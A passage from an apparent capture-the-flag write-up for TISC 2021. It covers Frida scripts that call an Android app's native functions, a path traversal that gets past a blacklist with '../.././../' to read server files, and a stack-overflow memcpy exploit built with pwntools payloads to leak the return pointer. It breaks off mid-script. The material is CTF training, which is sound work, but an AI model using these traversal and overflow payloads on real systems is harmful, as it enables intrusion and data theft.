      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 79, 1u);
      std::string::append((int)v20, (int)&all, 82, 1u);
      std::string::append((int)v20, (int)&all, 25, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 13, 1u);
      std::string::append((int)v20, (int)&all, 76, 1u);
      std::string::append((int)v20, (int)&all, 68, 1u);
      std::string::append((int)v20, (int)&all, 14, 1u);
      std::string::append((int)v20, (int)&all, 47, 1u);
      std::string::append((int)v20, (int)&all, 32, 1u);
      std::string::append((int)v20, (int)&all, 43, 1u);
      std::string::append((int)v20, (int)&all, 40, 1u);
      std::string::append((int)v20, (int)&all, 45, 1u);
      std::string::append((int)v20, (int)&all, 35, 1u);
      std::string::append((int)v20, (int)&all, 49, 1u);
      std::string::append((int)v20, (int)&all, 46, 1u);
      std::string::append((int)v20, (int)&all, 44, 1u);
      std::string::append((int)v20, (int)&all, 36, 1u);
      std::string::append((int)v20, (int)&all, 50, 1u);
      std::string::append((int)v20, (int)&all, 83, 1u);
      std::string::append((int)v20, (int)&all, 64, 1u);
      std::string::append((int)v20, (int)&all, 75, 1u);
      std::string::append((int)v20, (int)&all, 74, 1u);
      std::string::append((int)v20, (int)&all, 68, 1u);
      std::string::append((int)v20, (int)&all, 81, 1u);
      if ( (v20[0] & 1) != 0 )
        v9 = (char *)v21;
      else
        v9 = (char *)v20 + 1;
      v11 = (*(int (__cdecl **)(int, char *))(*(_DWORD *)a1 + 668))(a1, v9);
    }
    else
    {
      v11 = (*(int (__cdecl **)(int, const char *))(*(_DWORD *)a1 + 668))(a1, "Error: Wrong time. Try again.");
    }
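The numeric arguments to std::string::append look like indices into the all lookup table. The contents of that table are not shown, so the sketch below makes an assumption: that all holds printable ASCII characters starting at '!' (code 33). Under that assumption, the index sequence can be decoded statically without running the app.

```python
# Indices copied from the std::string::append calls, in order.
INDICES = [
    71, 83, 83, 79, 82, 25, 14, 14, 83, 13,
    76, 68, 14, 47, 32, 43, 40, 45, 35, 49,
    46, 44, 36, 50, 83, 64, 75, 74, 68, 81,
]

# Assumption: table entry 0 is '!' and entries follow ASCII order.
TABLE_BASE = ord("!")


def decode(indices, base=TABLE_BASE):
    """Map each table index to a character and join the result."""
    return "".join(chr(base + index) for index in indices)


print(decode(INDICES))
```

If the assumption about the table holds, the output is a URL, which fits the function name getNextPlace.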

Next, I grepped through the decompiled Java code and found that getTruth and getNextPlace were called in f/a/b.java:

    q.a(new g(0, "http://worldtimeapi.org/api/timezone/Etc/UTC", null, new c(mainActivity, textView), new f(textView)));
    String str2 = mainActivity.u;
    boolean z = true;
    if (!(str2 == null || str2.length() == 0)) {
        String nextPlace = mainActivity.y.getNextPlace(mainActivity.u, mainActivity.s, mainActivity.t);
        mainActivity.v = nextPlace;
        if (nextPlace == null || nextPlace.length() == 0) {
            mainActivity.x();
        } else {
            if (c.b.a.b.a.H(mainActivity.v, "Error", false, 2)) {
                mainActivity.x();
                context = mainActivity.getApplicationContext();
                str = mainActivity.v;
            } else {
                p q2 = f.q(mainActivity);
                View findViewById4 = mainActivity.findViewById(R.id.data_text);
                c.c(findViewById4, "findViewById(R.id.data_text)");
                TextView textView2 = (TextView) findViewById4;
                q2.a(new k(0, mainActivity.v, new g(mainActivity, textView2), new e(textView2)));
                String str3 = mainActivity.w;
                if (!(str3 == null || str3.length() == 0) || mainActivity.x != 0) {
                    int i2 = mainActivity.x;
                    if (i2 == 1) {
                        View findViewById5 = mainActivity.findViewById(R.id.flag_value);
                        c.c(findViewById5, "findViewById(R.id.flag_value)");
                        TextView textView3 = (TextView) findViewById5;
                        String string = Settings.Global.getString(mainActivity.getContentResolver(), "device_name");
                        if (!(string == null || string.length() == 0)) {
                            z = false;
                        }
                        if (z) {
                            string = Settings.Global.getString(mainActivity.getContentResolver(), "bluetooth_name");
                        }
                        Myth myth = mainActivity.y;
                        String str4 = mainActivity.w;
                        c.c(string, "user");
                        String truth = myth.getTruth(str4, string);
                        if (c.b.a.b.a.H(truth, "Error", false, 2)) {
                            Toast.makeText(mainActivity.getApplicationContext(), truth, 0).show();
                            return;
                        } else {
                            textView3.setText(truth);
                            return;
                        }

By tracing back variables using the jadx GUI “Find Usage” option, I reconstructed the flow of the application. mainActivity.y.getNextPlace took in the current timestamp from http://worldtimeapi.org/api/timezone/Etc/UTC (parsed to HH:MM) and the latitude and longitude, returning a link. After that, the application called myth.getTruth with str4 and the current username as arguments. Since the IDA decompilation already revealed that the user value needed to be GIB's phone, I only needed to find out the expected value of str4.

The decompiled Java code showed that String str4 = mainActivity.w; and mainActivity.w was set in f/a/g.java by the a function:

    public final void a(Object obj) {
        MainActivity mainActivity = this.a;
        TextView textView = this.f2157b;
        String str = (String) obj;
        int i = MainActivity.q;
        c.d(mainActivity, "this$0");
        c.d(textView, "$dataTextView");
        try {
            c.c(str, "response");
            int e2 = e.e(str, "tgme_page_description", 0, true, 2);
            String str2 = (String) e.g(str.subSequence(e2, e.b(str, "</div>", e2, true)), new String[]{">"}, false, 0, 6).get(1);
            mainActivity.w = str2;
            textView.setText(str2);
            mainActivity.x = 1;
        } catch (Exception unused) {
            mainActivity.x = -1;
        }
    }

I looked up tgme_page_description and learned that this was the HTML class for the description text in a Telegram group page.
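The parsing logic in the a function can be mirrored in a few lines of Python. This is a sketch of the same steps (find the class name, cut at the next closing div, split on ">" and take the second piece); the function name extract_description and the sample HTML are assumptions for illustration, not the real page markup.

```python
def extract_description(html):
    """Return the text that follows the tgme_page_description class attribute."""
    lowered = html.lower()                      # the Java code ignores case
    start = lowered.find("tgme_page_description")
    if start < 0:
        raise ValueError("description element not found")
    end = lowered.find("</div>", start)
    if end < 0:
        raise ValueError("closing </div> not found")
    # Slice looks like: tgme_page_description">TEXT
    return html[start:end].split(">")[1]


sample = '<div class="tgme_page_description">EXAMPLEDESCRIPTION</div>'
print(extract_description(sample))
```

Like the original, this breaks if the description itself contains nested tags, since only the text up to the next ">" is kept.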

I moved on to dynamic instrumentation with Frida and wrote a quick script to trigger getNextPlace directly in the application with the correct arguments.

function exploit() {
    // Check if frida has located the JNI
    if (Java.available) {
        // Switch to the Java context
        Java.perform(function() {
            const Myth = Java.use('mobi.thesecret.Myth');
            var myth = Myth.$new();
            var string_class = Java.use("java.lang.String");

            var out = string_class.$new("");
            var timestamp = string_class.$new("22:31");

            out = myth.getNextPlace(timestamp, 1.286, 103.785);
            console.log(out)
        }
    )}
}

I executed this script via my connected computer with frida -U 'The Secret' -l exploit.js. To my pleasant surprise, getNextPlace returned a Telegram link: https://t.me/PALINDROMEStalker. The description box displayed the string I was looking for: ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV.

Telegram Group

Now all I had to do was to feed getTruth the correct arguments.

function exploit() {

    // Check if frida has located the JNI
    if (Java.available) {
        // Switch to the Java context
        Java.perform(function() {
            const Myth = Java.use('mobi.thesecret.Myth');
            var myth = Myth.$new();
            var string_class = Java.use("java.lang.String");

            var out = string_class.$new("");
            var timestamp = string_class.$new("22:31");

            var tele_description = string_class.$new("ESZHUUSHCAJGKOBPHFAMVYUIFHFYFTVQKGFGZPNUBV");

            var user = string_class.$new("GIB's phone");

            out = myth.getNextPlace(timestamp, 1.286, 103.785);
            console.log(out)

            out = myth.getTruth(tele_description, user);
            console.log(out)
        }
    )}
}

The script printed the flag and completed this challenge.

TISC{YELENAFOUNDAWAYINSHEISOUREYESANDEARSWITHIN}

Level 8: Get-Shwifty

Domains: Web, Reverse Engineering, Pwn

We have managed to track down one of PALINDROME's recruitment operations!

Our intel suggest that they have defaced our website and insert their own recruitment test.

Pass their test and get us further into their organization!

We are counting on you!

The following links are mirrors of each other, flags are the same:

http://tisc21c-v3clxv6ecfdrvyrzn5mz7mchv8v7wcpv.ctf.sg:42651

http://tisc21c-8pz0kdhumzaj1lthraa6tm6t27righ8y.ctf.sg:42651

http://tisc21c-wwhvyoobqg08oegfsdvnmcflgfsbx0xd.ctf.sg:42651

NOTE: THE CHALLENGE DOES NOT INVOLVE EXTERNAL LINKS THAT MAY OR MAY NOT BE FOUND IN THE PROVIDED WEBSITE.

I finally reached the Elite Three. From this point onwards, the difficulty ratcheted up sharply, and each level took significant effort to crack. I groaned internally when I saw that Level 8 was a Pwn challenge: while I understood the basics of Windows binary exploitation, I lacked confidence in Linux exploitation and had never completed a Pwn CTF challenge before. Nevertheless, this was the only thing standing in the way of the first $10k.

I opened the link to the hacked website.

Hacked Page

I inspected the HTML source code and noticed a commented-out Find out more about the PALINDROME link. The link redirected to /hint/?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d which contained a single picture.

Hint

What other hint hash had I found...? I began fuzzing the hash query parameter and noticed that hash=./aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d returned the same picture. This suggested a file traversal vulnerability. However, attempting to go straight to ../../../../etc/passwd failed. I worked incrementally by traversing backwards one directory at a time and discovered that the application blacklisted three consecutive traversals (../../../). To bypass this, I simply used ../.././../ which successfully allowed me to access any file on the server! The page returned the file data as a base64-encoded image source.

<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>

<img src='data:image/png;base64,<BASE64 ENCODED FILE DATA>'>
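The blacklist bypass can be modelled with a short sketch. The server-side filter was not visible at this point, so is_blocked below is a guess at its behaviour (a plain substring check for three consecutive traversals), and the base directory is taken from the index.php path found later. The point is only that inserting a no-op "./" segment defeats a substring blacklist while resolving to the same file.

```python
import posixpath

BLOCKED_PATTERN = "../../../"          # assumed blacklist entry
BASE_DIR = "/var/www/html/hint"        # directory served by the hint page


def is_blocked(user_path):
    """Hypothetical filter: reject input containing the blocked pattern."""
    return BLOCKED_PATTERN in user_path


def resolve(user_path, base_dir=BASE_DIR):
    """Show where a relative path ends up once the segments are collapsed."""
    return posixpath.normpath(posixpath.join(base_dir, user_path))


direct = "../../../../etc/passwd"
bypass = "../.././../../etc/passwd"

for candidate in (direct, bypass):
    print(candidate, is_blocked(candidate), resolve(candidate))
```

Both inputs resolve to the same target, but only the first contains the blocked substring.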

Unfortunately, I did not find any interesting information in /etc/passwd or /etc/hosts. Eventually, I decided to check the source code of the website's pages which turned out to be PHP. I struck gold with /var//www/html/hint/index.php:

<!DOCTYPE html>
<html lang="en">
<head>
<title>lol</title>
</head>
<body>

<?php
    if($_GET["hash"]){
        echo "<img src='data:image/png;base64,".base64_encode(file_get_contents($_GET["hash"]))."'>";
        die();
    }else{
        header("Location: /hint?hash=aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d");
        die();
    }

    // to the furure me: this is the old directory listing
    // 
    // hint:
    // total 512
    // drwxrwxr-x 2 user user   4096 Jun 16 21:52 ./
    // drwxr-xr-x 5 user user   4096 Jun 16 21:11 ../
    // -rw-rw-r-- 1 user user     18 Jun 16 22:12 68a64066b1f37468f5191d627473891ac0ef9243
    // -rw-rw-r-- 1 user user 489519 Jun 16 15:47 aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d
    // -rw-rw-r-- 1 user user  15710 Jun 16 21:52 b5dbffb4375997bfcba86c4cd67d74c7aef2b14e
    // -rw-r--r-- 1 user user    551 Jun 16 21:30 index.php
?>

</body>
</html>

Following the directory listing, I accessed two new files.

68a64066b1f37468f5191d627473891ac0ef9243 was a text file that said i am also on 53619.

b5dbffb4375997bfcba86c4cd67d74c7aef2b14e contained another directory listing.

bin:
total 28
-rwsrwxr-x 1 root root 22752 Aug 19 15:59 1adb53a4b156cef3bf91c933d2255ef30720c34f

I proceeded to leak /var/www/html/bin/1adb53a4b156cef3bf91c933d2255ef30720c34f which turned out to be an ELF executable.
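Since every leaked file came back wrapped in a base64 image source, recovering the raw bytes is a matter of pulling the base64 text out of the response and decoding it. The sketch below works on an HTML string that has already been fetched; the function names extract_leaked_file and looks_like_elf are hypothetical, and the regular expression assumes the exact img tag format shown earlier.

```python
import base64
import re

# Matches the single-quoted data URI emitted by the hint page.
IMG_SRC = re.compile(r"<img src='data:image/png;base64,([^']*)'>")


def extract_leaked_file(html):
    """Decode the base64 payload embedded in the page's img tag."""
    match = IMG_SRC.search(html)
    if match is None:
        raise ValueError("no base64 image source found in response")
    return base64.b64decode(match.group(1))


def looks_like_elf(data):
    """Check for the four-byte ELF magic number at the start of the data."""
    return data.startswith(b"\x7fELF")
```

Checking the magic bytes is a quick way to tell whether a leaked file is an executable before loading it into a disassembler.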

Here it comes

As described in the text file earlier, this binary ran on port 53619 on the server. I executed it locally and was greeted by a large alien head.

        ___          
    . -^   `--,      
   /# =========`-_   
  /# (--====___====\ 
 /#   .- --.  . --.| 
/##   |  * ) (   * ),
|##   \    /\ \   / |
|###   ---   \ ---  |
|####      ___)    #|
|######           ##|
 \##### ---------- / 
  \####           (  
   `\###          |  
     \###         |  
      \##        |   
       \###.    .)   
        `======/     
SHOW ME WHAT YOU GOT!!!


////////////// MENU //////////////
//  0. Help                     //
//  1. Do Sanity Test           //
//  2. Get Recruited            //
//  3. Exit Program             //
//////////////////////////////////

The “Do Sanity Test” option prompted me for input.

To pass the sanity test, you just need to give a sane answer to show that you are not insane!
Your answer: 

After entering some random text, I tried the “Get Recruited” option. However, the application printed the error message You must be insane! Complete the Sanity Test to prove your sanity first!.

To figure out what was going on, I decompiled the application in IDA and annotated the pseudocode for the “Do Sanity Test” option.

__int64 sanity_test()
{
  void *v0; // rsp
  void *v1; // rsp
  void *v2; // rsp
  int v4; // [rsp+14h] [rbp-24h] BYREF
  void *s; // [rsp+18h] [rbp-20h]
  void *src; // [rsp+20h] [rbp-18h]
  void *dest; // [rsp+28h] [rbp-10h]
  unsigned __int64 v8; // [rsp+30h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  ++dword_5580E5357280;
  v4 = 32;
  v0 = alloca(48LL);
  s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
  v1 = alloca(48LL);
  src = s;
  v2 = alloca(48LL);
  dest = s;
  memset(s, 0, v4);
  memset(src, 0, v4);
  memset(dest, 0, v4);
  std::operator>><char,std::char_traits<char>>(&std::cin, src);
  memcpy(dest, src, v4);
  memcpy(s, dest, v4 / 2);
  sanity_test_input = malloc(v4 - 1);
  memcpy(sanity_test_input, s, v4 - 1);
  sanity_test_result = *((_BYTE *)s + v4 - 1);
  return 0LL;
}

Following a series of three suspicious memcpys, the function set sanity_test_result to the 32nd byte of the input. Next, the “Get Recruited” function checked if sanity_test_result && !(unsigned __int8)shl_sanity_test_result_7(). In other words, to pass the sanity test, I had to enter input such that sanity_test_result != 0 and (unsigned __int8)(sanity_test_result << 7) == 0. I could pass this check rather easily with an even number, such as 0x40 (@ in ASCII). Now, instead of displaying an error message, the “Get Recruited” option prompted me for a different set of inputs.

To get recruited, you need to provide the correct passphrase for the Cromulon.
Passphrase: AAA
Your passphrase appears to be incorrect.
You are allowed a few tries to modify your passphrase.
Use the following functions to provide the correct answer to get recruited.
1. Append String
2. Replace Appended String
3. Modify Appended String
4. Show what you have for the Cromulon currently
5. Submit
6. Back
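As an aside on the sanity check that unlocked this menu: the condition described above can be modelled in a few lines of Python. This is only a sketch that assumes shl_sanity_test_result_7() does nothing more than shift the stored byte left by 7 and truncate it to 8 bits, as the pseudocode suggests; the function name passes_sanity_test is made up for illustration.

```python
def passes_sanity_test(result: int) -> bool:
    """Model of: result != 0 and (unsigned __int8)(result << 7) == 0."""
    result &= 0xFF                   # sanity_test_result is a single byte
    shifted = (result << 7) & 0xFF   # truncate to 8 bits, like the cast
    return result != 0 and shifted == 0


print(passes_sanity_test(0x40))  # '@' is even and non-zero
print(passes_sanity_test(0x41))  # 'A' is odd, so its low bit survives the shift
```

Only the lowest bit of the byte survives the shift and truncation, which is why any non-zero even value works.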

The various options looked ripe for some kind of use-after-free vulnerability... except that there were not a lot of frees going on. The binary handled the appended strings using a linked list and I could not find any issues in the memory management. I also suspected that it suffered from a format string bug because entering %x%x%x for the passphrase caused the "Show what you have for the Cromulon currently" option to print e8e8e8. However, after further reverse engineering, I realised I had misunderstood the source of the strange output. It turned out that when appending, replacing, or modifying a string, the user's input would be XORed with the input from the sanity test before it was stored in the linked list. For example, since I entered a series of @s for the sanity test, @@ XOR %x == e8.

char __fastcall xor_passphrase_with_sanity_input(_BYTE *passphrase_data)
{
  char result; // al
  _BYTE *v2; // rax
  _BYTE *passphrase_data_2; // [rsp+0h] [rbp-18h]
  _BYTE *v4; // [rsp+10h] [rbp-8h]

  passphrase_data_2 = passphrase_data;
  v4 = sanity_test_input;
  result = *passphrase_data;
  if ( *passphrase_data )
  {
    result = *(_BYTE *)sanity_test_input;
    if ( *(_BYTE *)sanity_test_input )
    {
      do
      {
        if ( !*v4 )
          v4 = sanity_test_input;
        v2 = v4++;
        *passphrase_data_2++ ^= *v2;
        result = *passphrase_data_2 != 0;
      }
      while ( *passphrase_data_2 );
    }
  }
  return result;
}
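A rough Python model of this routine makes the behaviour easier to see. It is a sketch rather than a faithful port: the function name xor_with_sanity_input is invented here, and both buffers are treated as C strings that end at the first null byte.

```python
def xor_with_sanity_input(passphrase: bytes, sanity_input: bytes) -> bytes:
    """XOR a C-string passphrase with a repeating C-string key."""
    key = sanity_input.split(b"\x00", 1)[0]   # key stops at its first null byte
    text = passphrase.split(b"\x00", 1)[0]    # so does the passphrase
    if not text or not key:
        return text                           # the C code skips the loop entirely
    # The key pointer wraps back to the start whenever it reaches the terminator.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(text))


stored = xor_with_sanity_input(b"%x%x%x", b"@" * 31)
print(stored)  # what the "Show" option would later print
```

Because XOR is its own inverse, XORing the displayed bytes with the passphrase that was typed in gives back the corresponding bytes of sanity_test_input.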

This behaviour resembled an information leak, so perhaps the actual vulnerability occurred in the sanity test. Remember the suspicious series of memcpys?

I started the application in gdb with the pwndbg extension and entered a long series of As for the sanity test. I got a crash and traced it back to the first memcpy. The arguments to memcpy were overwritten by my input:

dest: 0x4141414141414141 ('AAAAAAAA')
src: 0x4141414141414141 ('AAAAAAAA')
n: 0x41414141 ('AAAA')

This looked like a powerful write-what-where gadget! However, exploitation would not be easy. I ran checksec and confirmed that all possible memory protections were turned on, therefore ruling out a simple return pointer overwrite exploit.

pwndbg> checksec
[*] '/home/kali/Desktop/tisc/8_get_shwifty/1adb53a4b156cef3bf91c933d2255ef30720c34f'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

I took a closer look at the sanity test pseudocode to figure out another way to exploit this overwrite.

void *v0; // rsp
void *v1; // rsp
void *v2; // rsp
int v4; // [rsp+14h] [rbp-24h] BYREF
void *s; // [rsp+18h] [rbp-20h]
void *src; // [rsp+20h] [rbp-18h]
void *dest; // [rsp+28h] [rbp-10h]
unsigned __int64 v8; // [rsp+30h] [rbp-8h]

v8 = __readfsqword(0x28u);
++dword_5580E5357280;
v4 = 32;
v0 = alloca(48LL);
s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
v1 = alloca(48LL);
src = s;
v2 = alloca(48LL);
dest = s;
memset(s, 0, v4);
memset(src, 0, v4);
memset(dest, 0, v4);
std::operator>><char,std::char_traits<char>>(&std::cin, src);
memcpy(dest, src, v4);
memcpy(s, dest, v4 / 2);
sanity_test_input = malloc(v4 - 1);
memcpy(sanity_test_input, s, v4 - 1);
sanity_test_result = *((_BYTE *)s + v4 - 1);
return 0LL;

The alloca and memcpy calls were run in a precise order. I set a breakpoint at the first memcpy and triggered the overflow again to analyse the stack. After a few repetitions, I figured out how the overflow worked. At the memcpy breakpoint, the stack looked like this:

00: 0x00000000  0x00000000  0x00000000  0x00000000 < *1st memcpy dst / *2nd memcpy src
10: 0x00000000  0x00000000  0x00000000  0x00000000
20: 0x00000000  0x00000000  0xaf79a963  0x00007fab
30: 0x41414141  0x41414141  0x41414141  0x41414141 < *1st memcpy src / start of user-controlled input
40: 0x41414141  0x41414141  0x41414141  0x41414141
50: 0x41414141  0x41414141  0x41414141  0x41414141
60: 0x41414141  0x41414141  0x41414141  0x41414141 < *2nd memcpy dst
70: 0x41414141  0x41414141  0x41414141  0x41414141
80: 0x41414141  0x41414141  0x41414141  0x41414141
90: 0x41414141  0x41414141  0x41414141  0x00000030 < 12 bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
a0: 0x5d7d2b60  0x00007ffc  0x5d7d2b30  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
b0: 0x5d7d2b00  0x00007ffc  0x48531900  0xa14ea5c4 < 1st memcpy dst / 2nd memcpy src | stack canary 
c0: 0x5d7d2bf0  0x00007ffc  0x86bfeea2  0x0000563e < 8 bytes | return pointer
d0: 0x86c00010  0x0000563e  0x86bfd540  0x0001013e
e0: 0x86c01956  0x0000563e  0x48531900  0xa14ea5c4

If I overwrote every byte until the return pointer, I would also overwrite the stack canary, which would trigger an error. However, remember how the inputs for the "Get Recruited" functions were XORed with sanity_test_input? Since I controlled each of the three memcpys' arguments via the overwrite, I could attempt to copy the stack canary into sanity_test_input using the third memcpy, then retrieve the XORed canary via the "Show what you have for the Cromulon currently" function.

Initially, I planned to overwrite the bytes up till the first memcpy n argument and set n to a large enough number to also copy over the stack canary bytes. However, since the second memcpy used n / 2 for the size argument, to ensure that the canary was copied over in the second memcpy, n needed to be so large that the first memcpy would already overwrite the stack canary. Worse, I also realised that the copied bytes had to be null-free because the xor_passphrase_with_sanity_input function only XORed the appended strings up till the first null byte in sanity_test_input. It dawned on me that I had to thread a very fine needle; this challenge was surgically designed.

(I would later learn that this was in fact the hardest possible way I could have solved this challenge; there was a simpler stack setup as well as a heap exploit route but clearly I wanted to suffer more.)

In order to properly leak data from the stack, I needed to overwrite the bytes in such a way that the 3rd memcpy copied over stack bytes into sanity_test_input that would both pass the sanity test AND be XORed later on. I tested various permutations of overwritten bytes, using pwntools to speed up my work. To quickly debug the program, I wrote a Bash one-liner: gdb ./1adb53a4b156cef3bf91c933d2255ef30720c34f $(ps aux | grep ./1adb53a4b156cef3bf91c933d2255ef30720c34f | grep -v grep | cut -d ' ' -f9). This would hook onto the running instance created by my pwntools script.

After painstakingly trying hundreds of different inputs over several hours, I eventually figured out an overwrite that would get the result I wanted. By crafting my payload with precise offsets, I could manipulate the first two memcpys such that I overwrote the last byte in the 3rd memcpy's src argument on the stack. With luck, the overwritten byte would cause the src to point to the return address or any other desired value such as the canary. I needed luck because the stack addresses changed each time the binary was executed. As such, I had to brute force the correct offset.

It may be easier to explain this by stepping through each memcpy, so let's get right into it.

I prepared my payload like this:

payload = b'B' * 60                                 # offset
payload += b'\x11\x00\x00\x00'                      # third memcpy n; vary this until sanity test passes
payload += packing.p8(return_pointer_offset)        # candidate offset to return pointer on stack
payload += b'B' * 43                                # more offset
payload += b'\x82'                                  # first memcpy n / second memcpy n * 2
p.sendline(payload)

With this payload, the stack BEFORE the first memcpy looked like this:

75d0: 0x00000000  0x00000000  0x00000000  0x00000000 < *1st memcpy dst / *2nd memcpy src
75e0: 0x00000000  0x00000000  0x00000000  0x00000000 
75f0: 0x00000000  0x00000000  0x656c2963  0x00007fca < 8 null bytes | libc_write+19
7600: 0x41414141  0x41414141  0x41414141  0x41414141 < *1st memcpy src / start of user-controlled input
7610: 0x41414141  0x41414141  0x41414141  0x41414141 
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x00000011 < *2nd memcpy dst
7640: 0x424242XX  0x41414141  0x41414141  0x41414141 < candidate XX offset
7650: 0x41414141  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000082 < 12 filler bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 1st memcpy dst / 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

Thanks to the overflow from receiving user input, I overwrote the value of n on the stack to \x82. This caused the first memcpy to copy both my original inputs and additional bytes on the stack to *1st memcpy dst. The stack AFTER the first memcpy and BEFORE the second memcpy now looked like this:

75d0: 0x41414141  0x41414141  0x41414141  0x41414141 < *2nd memcpy src
75e0: 0x41414141  0x41414141  0x41414141  0x41414141 
75f0: 0x41414141  0x41414141  0x41414141  0x41414141
7600: 0x41414141  0x41414141  0x41414141  0x00000011
7610: 0x424242XX  0x41414141  0x41414141  0x41414141 < candidate XX offset
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x00000082 < *2nd memcpy dst
7640: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc 
7650: 0x424275d0  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000082 < 12 filler bytes | 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630  0x00007ffc  0xb5617600  0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

Nothing too special. However, the magic happened in the next memcpy. The stack AFTER the second memcpy and BEFORE the third memcpy looked like this:

75d0: 0x41414141  0x41414141  0x41414141  0x41414141
75e0: 0x41414141  0x41414141  0x41414141  0x41414141 
75f0: 0x41414141  0x41414141  0x41414141  0x41414141
7600: 0x41414141  0x41414141  0x41414141  0x00000011
7610: 0x424242XX  0x41414141  0x41414141  0x41414141
7620: 0x41414141  0x41414141  0x41414141  0x41414141
7630: 0x41414141  0x41414141  0x41414141  0x41414141
7640: 0x41414141  0x41414141  0x41414141  0x41414141 
7650: 0x41414141  0x41414141  0x41414141  0x41414141
7660: 0x41414141  0x41414141  0x41414141  0x00000011 < 12 filler bytes | 3rd memcpy n + 1
7670: 0xb56176XX  0x00007ffc  0xb5617600  0x00007ffc < 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0  0x00007ffc  0xd1686300  0x697ee648 < 2nd memcpy src | stack canary 
7690: 0xb56176c0  0x00007ffc  0x2b782ea2  0x00005597 < stack pointer | return pointer
76a0: 0x2b784010  0x00005597  0x2b781540  0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956  0x00005597  0xd1686300  0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010  0x00005597  0x655fbe4a  0x00007fca < _libc_csu_init | __libc_start_main+234

I overwrote two important values:

  1. The n used to generate the 3rd memcpy's size argument (n-1) to 0x11.
  2. The last byte of the 3rd memcpy's src argument to my candidate byte offset 0xXX.

When my brute force set the candidate byte to 0x98, the 3rd memcpy's src pointed to the stack address of the return pointer (0x7ffcb5617698), allowing me to copy the return pointer value to sanity_test_input. The overwritten n also set sanity_test_result to *0x7ffcb56176a8 = 0x40, which passed the sanity test. After that, I could simply enter a 16-character string like 1111111111111111 (matching the 0x10 bytes copied by the 3rd memcpy) at the "Get Recruited" prompt, which was then XORed with the stored sanity_test_input. I could then run "Show what you have for the Cromulon currently" to output the result and XOR it with 1111111111111111 again to retrieve the return pointer value.
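The three copies can be replayed on a toy model of the stack to check the arithmetic. The sketch below is an approximation: it models 0x100 bytes starting at the first memcpy's destination, fills in the values from the dumps above, and assumes the function reloads n and the three pointers from the stack before every call. All helper names are invented for illustration.

```python
import struct

BASE = 0x7FFCB56175D0                      # lowest modelled address
N, S, SRC, DEST = 0x9C, 0xA0, 0xA8, 0xB0   # slots holding v4 and the 3 pointers
RET = 0x55972B782EA2                       # return pointer value from the dump


def build_stack() -> bytearray:
    stack = bytearray(0x100)
    struct.pack_into("<I", stack, N, 32)
    struct.pack_into("<Q", stack, S, BASE + 0x60)
    struct.pack_into("<Q", stack, SRC, BASE + 0x30)
    struct.pack_into("<Q", stack, DEST, BASE)
    struct.pack_into("<Q", stack, 0xB8, 0x697EE648D1686300)   # stack canary
    struct.pack_into("<Q", stack, 0xC0, 0x7FFCB56176C0)       # saved stack pointer
    struct.pack_into("<Q", stack, 0xC8, RET)
    struct.pack_into("<Q", stack, 0xD0, 0x55972B784010)
    struct.pack_into("<Q", stack, 0xD8, 0x000101972B781540)
    return stack


def load_n(stack: bytearray) -> int:
    return struct.unpack_from("<I", stack, N)[0]


def load_ptr(stack: bytearray, slot: int) -> int:
    return struct.unpack_from("<Q", stack, slot)[0] - BASE


def copy(stack: bytearray, dst: int, src: int, n: int) -> None:
    stack[dst:dst + n] = stack[src:src + n]


def sanity_test(stack: bytearray, payload: bytes):
    src = load_ptr(stack, SRC)
    data = payload + b"\x00"                     # cin >> appends a terminator
    stack[src:src + len(data)] = data            # unbounded read into src
    copy(stack, load_ptr(stack, DEST), load_ptr(stack, SRC), load_n(stack))
    copy(stack, load_ptr(stack, S), load_ptr(stack, DEST), load_n(stack) // 2)
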